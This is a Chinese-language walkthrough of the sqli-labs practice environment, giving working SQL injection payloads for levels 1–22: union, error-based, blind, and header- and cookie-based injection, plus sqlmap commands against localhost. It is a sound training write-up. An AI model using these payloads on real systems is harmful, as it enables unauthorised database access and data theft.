range

sqli-labs

搭建

1
2

docker run -it -d --name sqli-labs -p 80:80 -p 13306:3306 acgpiano/sqli-labs

过关

第1关

闭合符号是',直接干

1
1' union select 1,group_concat(schema_name),3 from information_schema.schemata --+

第2关

数字型,没有闭合符号,直接干

1
-1 union select 1,group_concat(schema_name),3 from information_schema.schemata --+

第3关

闭合符号是'),直接干

1
-1') union select 1,group_concat(schema_name),3 from information_schema.schemata --+

第4关

闭合符号是"),直接干

1
-1")  union select 1,group_concat(schema_name),3 from information_schema.schemata --+

第5关

闭合符号是',不能联合查询,不能直接干,可以报错,直接干

1
1' and extractvalue(0x0a,concat(0x0a,(select database()))) --+

第6关

闭合符号是",不能直接干,可以报错,直接干

1
-1"  and extractvalue(0x0a,concat(0x0a,(select database())))--+

第7关

闭合符号是')),布尔盲注,直接干🙅,sqlmap一把梭

1
')) and left(database(), 1) > 't' --+

命令

1
sqlmap -u 'http://localhost:7777/Less-7/?id=1' -v 3 --dbms mysql --tech B -p id

第8关

闭合符号是',布尔盲注,直接干不了

1
1' and sleep(1) --+
1
2
# 一把梭哈
sqlmap -u 'http://localhost:7777/Less-8/?id=1' -v 3 --dbms mysql --tech B

第9关

闭合符号是',时间盲注,直接干不了

1
1' and sleep(1) --+
1
2
# 一把梭哈
sqlmap -u 'http://localhost:7777/Less-9/?id=1' -v 3 --dbms mysql --tech T --batch -p id

第10关

闭合符号是",时间盲注,直接干不了

1
1" and sleep(1) --+

跟第9关一样,不写了,sqlmap一把梭

第11关

这一关要登陆,我们去前几关整几个账号密码,开干username:Dumb,password:Dumb

闭合符号是',报错注入,直接干

1
passwd=Dumb&submit=Submit&uname=Dumb' or extractvalue(0x0a,concat(0x0a,(select database())))--+

第12关

闭合符号是"),报错注入,直接干

1
passwd=Dumb&submit=Submit&uname=Dumb") and extractvalue(0x0a,concat(0x0a,(select database()))) --+

第13关

闭合符号是'),报错注入,直接干

1
passwd=Dumb&submit=Submit&uname=Dumb') and extractvalue(0x0a,concat(0x0a,(select database()))) --+

第14关

闭合符号是",报错注入,直接干

1
passwd=Dumb&submit=Submit&uname=Dumb" or extractvalue(0x0a,concat(0x0a,(select database()))) --+

第15关

闭合符号是',布尔盲注,直接干

1
passwd=Dumb&submit=Submit&uname=Dumb' and 1=0 --+

sqlmap一把梭

1
sqlmap -r ~/15 -p uname  --dbms mysql

第16关

闭合符号是"),布尔盲注,直接干

1
passwd=Dumb&submit=Submit&uname=Dumb") and 1=0  --+

抓包copytofile,sqlmap一把梭

1
sqlmap -r ~/15 -p uname  --dbms mysql

第17关

闭合符号是',updata型的报错注入,直接干

1
passwd=Dumb'and extractvalue(0x0a,concat(0x0a,(select database()))) and'&submit=Submit&uname=Dumb

第18关

闭合符号是',ua头注入,可以报错,直接干

1
User-Agent: a' or  extractvalue(0x0a,concat(0x0a,(select database()))) or '

第19关

闭合符号是',ref头注入,可以报错,直接干

1
2
        'or sleep(1) or'
Referer:' or extractvalue(0x0a,concat(0x0a,(select database())))  or '

第20关

闭合符号是',报错注入,注入点在cookie,直接干

1
Cookie: uname=Dumb' or updatexml(1,concat(1,database(),1),1) --+

第21关

闭合符号是'),报错注入,注入点在cookie,加了一层base64,直接干

1
Cookie: uname=RHVtYicpYW5kIGV4dHJhY3R2YWx1ZSgweDBhLGNvbmNhdCgweDBhLChzZWxlY3QgZGF0YWJhc2UoKSkpKSM%3d

第22关

闭合符号是",报错注入,注入点在cookie,直接干

1
Cookie: uname=RHVtYiIgYW5kIGV4dHJhY3R2YWx1ZSgweDBhLGNvbmNhdCgweDBhLChzZWxlY3QgZGF0YWJhc2UoKSkpKSAgIw%3d%3d